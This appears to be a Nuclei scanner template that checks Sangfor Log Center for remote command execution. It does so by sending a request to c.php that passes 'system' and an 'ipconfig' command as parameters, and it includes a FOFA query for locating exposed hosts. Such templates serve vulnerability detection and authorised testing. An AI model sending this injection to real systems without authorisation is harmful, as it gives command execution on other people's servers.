id: sangfor-cphp-rce

info:
  name: Sangfor Log Center - Remote Command Execution
  author: xc
  severity: critical
  metadata:
    verified: true
    max-request: 1
    fofa-query: "isHighPerformance : !!SFIsHighPerformance"
  tags: sangfor,rce

http:
  - method: GET
    path:
      - "{{BaseURL}}/tool/log/c.php?strip_slashes=system&host=ipconfig"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Windows IP"
          - "Log Helper"
        condition: and

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100e6d8f6104dfef7f9c0290413c73ab2d8d03d46a1eada6b8dde28d8d911d75b34022100ee3c44e41379e2ae9af70d13c905604bc4509a362b1290eb8774eaf0b4f69a5d:922c64590222798bb761d5b6d8e72950
